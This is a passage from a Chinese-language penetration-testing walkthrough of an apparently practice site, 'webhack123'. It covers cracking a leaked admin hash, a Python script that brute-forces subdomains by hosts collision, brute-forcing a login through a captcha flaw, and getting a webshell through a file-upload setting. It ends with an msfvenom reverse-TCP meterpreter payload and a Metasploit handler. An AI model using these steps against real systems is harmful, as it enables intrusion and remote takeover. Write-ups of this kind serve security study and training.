<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:16.6pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">urls = add_urls(url,"20")</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">for i in urls:</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:21.5pt;margin-right:281.75pt;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">req=requests.get(i) if req.status_code==200: print(i)</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:42.5pt;margin-right:128.05pt;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">html = req.text with open("webhack123.txt",'a',encoding='utf-8') as f:</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:15.2pt;margin-left:63.5pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">f.write(html)</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">执行如下</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:36.95pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="553" height="686" src="https://www.2k8.org/content/uploadfile/202203/17/7d5f68c5.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h2 style="margin-top:0cm;margin-right:0cm;margin-bottom:13.55pt;margin-left:-.25pt;">
        <a name="_Toc21050"></a><span lang="EN-US">3.7.</span><span><span style="font-family:黑体;font-weight:normal;">发现管理密文</span></span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">thinkphp </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">低版本在会记录修改密码的日志</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:11.55pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="554" height="63" src="https://www.2k8.org/content/uploadfile/202203/17/af0e5ee0.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">账号 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">admin </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">密文 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">74c774ef39b5b977c1fd59dbfc73c3e380a65aa3</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:7.95pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="554" height="155" src="https://www.2k8.org/content/uploadfile/202203/17/1b075e26.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:39.05pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">通过 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">somd5 </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">解 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">web123</span><span lang="EN-US"></span>
</p>
<h2 style="margin-top:0cm;margin-right:0cm;margin-bottom:13.55pt;margin-left:-.25pt;">
        <a name="_Toc21051"></a><span lang="EN-US">3.8.</span><span><span style="font-family:黑体;font-weight:normal;">绑定 </span><span lang="EN-US">hosts </span></span><span><span style="font-family:黑体;font-weight:normal;">碰撞管理后台子域名</span></span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:1.75pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">如果扫描目录后台 还是找不到后台可以试试绑定 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">hosts </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">碰撞子域名这种方法</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:1.2pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:107%;">最近有老哥写了一个脚本在 </span><span lang="EN-US"><a href="https://github.com/fofapro/Hosts_scan"><span style="color:blue;font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">https://github.com/fofapro/Hosts_scan</span></a></span><u style="text-underline:blue;"><span lang="EN-US" style="color:blue;font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;"> </span></u><span style="font-family:宋体;font-size:10.5pt;line-height:107%;">脚本与我的需求有点</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:16.9pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">不合适小修改了一下自动导入 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">top3K </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">子域名进行穷举碰撞 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">IP </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">修改后的脚本</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">#!/usr/bin/python</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;"># -*- coding: UTF-8 -*-</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">#Author:R3start</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:17.9pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">#</span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">这是一个用于 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">IP </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">和域名碰撞匹配访问的小工具</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:30.95pt;margin-left:-.25pt;margin-right:312.3pt;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">import requests import re</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">lists=[]</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">files = open('hosts_ok.txt','w+')</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:2.1pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">#</span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">读取 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">IP </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">地址</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.75pt;margin-right:0cm;margin-top:0cm;tab-stops:center 339.2pt 375.3pt right 416.75pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">print("==================================== </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">开<span lang="EN-US"><span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span>始<span lang="EN-US"><span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span>匹<span lang="EN-US"><span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span>配</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:137.95pt;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">====================================") for iplist in open("ip.txt"):</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:21.5pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">ip = iplist.strip('\n')</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:1.95pt;margin-left:21.5pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">#</span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">读取 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">host </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">地址</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:21.5pt;margin-right:266.6pt;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">#http_s = ['http://','https://'] http_s = ['http://'] for h in http_s :</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:63.0pt;margin-right:162.95pt;margin-top:0cm;text-indent:-21.0pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">for d in open("top3kdomain.txt",'r'):#moonsec d = d.strip('\n') for hostlist in open("host.txt",'r'):</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:84.5pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">host = d+"."+hostlist.strip('\n')</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:1.35pt;margin-left:0cm;margin-right:0cm;margin-top:0cm;tab-stops:center 102.3pt 132.2pt 227.8pt 342.65pt 380.45pt right 416.75pt;">
        <span lang="EN-US"><span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">headers<span>&nbsp;&nbsp; </span>=<span>&nbsp;&nbsp; </span>{'Host':host,'User-Agent':'Mozilla/5.0<span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>(Windows<span> </span>NT<span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>10.0;</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'}</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:84.5pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">try:</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:105.5pt;margin-right:6.2pt;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">r = requests.session() requests.packages.urllib3.disable_warnings() rhost = r.get(h+ip,verify=False,headers=headers,timeout=5) rhost.encoding='utf-8' title = re.search('&lt;title&gt;(.*)&lt;/title&gt;', rhost.text).group(1) #</span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">获取标题</span><span lang="EN-US"></span>
</p>
<p align="right" style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:1.35pt;margin-left:.5pt;margin-right:.05pt;margin-top:0cm;text-align:right;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">info = '%s -- %s </span><span style="font-family:宋体;font-size:10.5pt;line-height:107%;">协议： </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">%s </span><span style="font-family:宋体;font-size:10.5pt;line-height:107%;">数据包大小： </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">%d </span><span style="font-family:宋体;font-size:10.5pt;line-height:107%;">标题： </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">%s' %</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:104.25pt;margin-right:205.85pt;margin-top:0cm;text-indent:-105.0pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">(ip,host,h,len(rhost.text),title) lists.append(info) files.write(info + "\n") print(info)</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:84.5pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">except Exception :</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:105.5pt;margin-right:43.0pt;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">error = ip + " --- " + host + " --- </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">访问失败！</span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">~" print(error)</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">print("==================================== </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">匹 配 成 功 的 列 表</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:137.95pt;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">====================================") for i in lists:</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:15.8pt;margin-left:21.5pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">print(i)</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">因为目标没用 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">https </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">协议 可以只用 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">http </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">协议进行碰撞测试</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
        <img width="553" height="329" src="https://www.2k8.org/content/uploadfile/202203/17/7d655e2d.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:5.7pt;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
        <img width="553" height="244" src="https://www.2k8.org/content/uploadfile/202203/17/69833577.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:4.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">admin.webhack123.com </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">这个就是它的后台地址</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:25.15pt;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
        <img width="553" height="261" src="https://www.2k8.org/content/uploadfile/202203/17/4bec0b44.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h2 style="margin-top:0cm;margin-right:180.7pt;margin-bottom:13.55pt;margin-left:-.25pt;line-height:259%;">
        <a name="_Toc21052"></a><span lang="EN-US">3.9.</span><span><span style="font-family:黑体;font-weight:normal;">后台验证码逻辑漏洞</span></span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:259%;margin-bottom:13.55pt;margin-left:-.25pt;margin-right:180.7pt;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:259%;">可以穷举密码</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:44.3pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="554" height="481" src="https://www.2k8.org/content/uploadfile/202203/17/0ad53366.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h2 style="margin-left:-.25pt;">
        <a name="_Toc21053"></a><span lang="EN-US">3.10. </span><span><span style="font-family:黑体;font-weight:normal;">设置上传文件类型拿 </span><span lang="EN-US">webshell</span></span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:18.85pt;margin-left:21.25pt;margin-right:-19.35pt;margin-top:0cm;">
        <img width="553" height="391" src="https://www.2k8.org/content/uploadfile/202203/17/02fba6cb.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:74.7pt;margin-left:22.8pt;margin-right:-12.6pt;margin-top:0cm;">
        <img width="542" height="184" src="https://www.2k8.org/content/uploadfile/202203/17/e584a7f4.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h1 style="margin-top:0cm;margin-right:0cm;margin-bottom:18.0pt;margin-left:-.25pt;">
        <a name="_Toc21054"></a><b><span lang="EN-US" style="font-family:Segoe UI,sans-serif;">4.metasploit </span></b>进行提权和信息收集<span lang="EN-US"></span>
</h1>
<h2 style="margin-top:0cm;margin-right:0cm;margin-bottom:13.55pt;margin-left:-.25pt;">
        <a name="_Toc21055"></a><span lang="EN-US">4.1.</span><span><span style="font-family:黑体;font-weight:normal;">生成攻击载荷</span></span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:1.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:宋体;font-size:10.5pt;line-height:112%;">phpstudy</span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">套件是默认是系统权限的直接上传执行<span lang="EN-US">exe</span>就是高权限了</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:110%;margin-bottom:3.15pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:9.0pt;line-height:110%;">msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.127 lport=12345 -f exe &gt;s.exe</span><span lang="EN-US"></span>
</p>
<h2 style="margin-left:-.25pt;">
        <a name="_Toc21056"></a><span lang="EN-US">4.2.</span><span><span style="font-family:黑体;font-weight:normal;">监听上线</span></span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">msf5 &gt; use exploit/multi/hander</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">[-] No results from search</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:66.95pt;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">[-] Failed to load module: exploit/multi/hander msf5 &gt; use exploit/multi/handler msf5 exploit(multi/handler) &gt; set payload windows/meterpreter/reverse_tcp payload =&gt; windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) &gt; set lhost 192.168.0.127 lhost =&gt; 192.168.0.127 msf5 exploit(multi/handler) &gt; set lport 12345 lport =&gt; 12345</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:5.35pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">msf5 exploit(multi/handler) &gt; exploit</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:7.05pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="553" height="51" src="https://www.2k8.org/content/uploadfile/202203/17/8fc139c5.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:2.0pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">权限</span><span lang="EN-US"></span>
</p>
